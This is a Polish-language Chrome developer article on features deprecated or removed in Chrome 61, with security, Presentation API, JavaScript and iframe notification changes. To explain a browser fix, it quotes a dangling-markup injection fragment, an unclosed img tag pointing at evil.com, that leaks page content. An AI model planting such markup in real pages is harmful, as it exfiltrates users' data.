W prawie każdej wersji Chrome wprowadzamy znaczną liczbę aktualizacji i ulepszeń dotyczących produktu, jego wydajności oraz możliwości platformy internetowej. W tym artykule opisano funkcje, które zostały wycofane lub usunięte w Chrome 61, które od 3 sierpnia jest dostępne w wersji beta. Ta lista może ulec zmianie w każdej chwili.
Bezpieczeństwo i prywatność
Blokowanie zasobów, których adresy URL zawierają znaki „\n” i „<”
Istnieje rodzaj hakowania zwany wstrzyknięciem wiszącego znacznika, w którym do wysyłania danych do zewnętrznego punktu końcowego używany jest skrócony adres URL. Weźmy na przykład stronę zawierającą <img src='https://evil.com/?. Ponieważ adres URL nie zawiera zamykającego cudzysłowu, przeglądarki będą czytać do następnego cudzysłowu i traktować zawarte w nim znaki jak pojedynczy adres URL.
Chrome 61 ogranicza tę podatność na atak, ograniczając zestawy znaków dozwolone w atrybutach href i src. W szczególności Chrome przestanie przetwarzać adresy URL, gdy napotka znaki nowego wiersza (\n) i mniej niż 3 znaki (<).
Deweloperzy, którzy mają uzasadnione potrzeby związane z użyciem znaku nowej linii i znaku mniejszego niż w adresie URL, powinni stosować ucieczki przed tymi znakami.
Intend to Remove | Chromestatus Tracker | Chromium Bug
wycofanie interfejsu Presentation API w niezabezpieczonych kontekstach i usunięcie go,
Wykryliśmy, że w niebezpiecznych źródłach interfejs Presentation API może być wykorzystywany jako wektor hakowania. Ponieważ wyświetlacze nie mają pasków adresów, interfejs API może służyć do podszywania treści. Możliwe jest też wydobycie danych z działającej prezentacji.
Zgodnie z zamierzeniami Blink dotyczącymi usunięcia zaawansowanych funkcji w niebezpiecznych źródłach planujemy wycofać obsługę interfejsu Presentation API w niebezpiecznych kontekstach. Od Chrome 61 metoda PresentationRequest.start() nie będzie już działać w przypadku niezabezpieczonych źródeł.
Intend to Remove | Chromestatus Tracker | Chromium Bug
JavaScript
Zabranie możliwości definiowania właściwości indeksowanych w oknach
Wcześniej niektóre przeglądarki zezwalały na przypisywanie JavaScriptu w taki sposób:
window[0] = 1;
Obecna specyfikacja HTML wyraźnie stwierdza, że jest to wyraźne naruszenie specyfikacji JavaScriptu. Dlatego ta funkcja została usunięta w Chrome 61. Od lutego 2016 r. Firefox jest zgodny z tymi wymogami.
Usuwanie możliwości wysyłania powiadomień z niezabezpieczonych ramek iframe
Prośby o przyznanie uprawnień z ramek iframe mogą wprowadzać użytkowników w błąd, ponieważ trudno jest odróżnić pochodzenie strony zawierającej od pochodzenia ramki iframe, która wysyła żądanie. Jeśli zakres żądań jest niejasny, użytkownicy mogą mieć trudności z zadaniem sobie pytania, czy przyznać uprawnienia.
Zablokowanie powiadomień w ramkach iframe pozwoli też dostosować wymagania dotyczące zgody na powiadomienia do wymagań dotyczących powiadomień push, co ułatwi pracę deweloperom.
Deweloperzy, którzy potrzebują tej funkcji, mogą otworzyć nowe okno, aby poprosić o uprawnienia dotyczące powiadomień.